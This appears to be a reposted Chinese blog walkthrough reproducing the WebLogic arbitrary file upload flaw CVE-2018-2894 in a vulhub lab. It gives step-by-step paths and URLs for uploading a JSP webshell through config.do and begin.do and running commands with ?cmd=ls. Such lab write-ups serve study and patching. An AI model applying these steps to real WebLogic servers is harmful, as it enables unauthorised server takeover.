Weblogic 任意檔案上傳漏洞(CVE-2018-2894)
影響版本:
Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3,
復現環境:
vulhub
漏洞條件:
Web Service Test Page 開啟,注:Web Service Test Page 在“生產模式”下默認不開啟
漏洞原因:
Weblogic管理端未授權的兩個頁面存在任意上傳jsp檔案漏洞,進而獲取服務器權限
復現步驟:
1,從config.do上傳
先登入weblogic的管理員后臺進行一些更改:

使用docker-compose logs | grep password命令可以看到密碼:

用賬號進行登錄:

點擊base_domain的配置,在“高級”中開啟“啟用 Web 服務測驗頁”選項:

訪問:http://ip:7001/ws_utc/config.do,設定Work Home Dir為/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css,設定上傳目錄為ws_utc應用的靜態檔案css目錄,訪問這個目錄是無需權限的:

然后點擊安全中的增加,然后上傳webshell:

上傳后查看下回傳包的時間戳:
1635755522916

然后訪問http://your-ip:7001/ws_utc/css/config/keystore/時間戳_檔案名,即可執行webshell:

2,從begin.do上傳
訪問:http://ip:7001/ws_utc/begin.do:

在:/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css/upload/RS_Upload_2021-11-01_09-01-12_855/import_file_name_shell111.jsp

上傳成功:

http://127.0.0.1:7001/ws_utc/css/upload/RS_Upload_2021-11-01_11-47-07_524/import_file_name_shell111.jsp?cmd=ls,成功執行命令:

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/344119.html
標籤:其他
上一篇:Java 執行緒安全
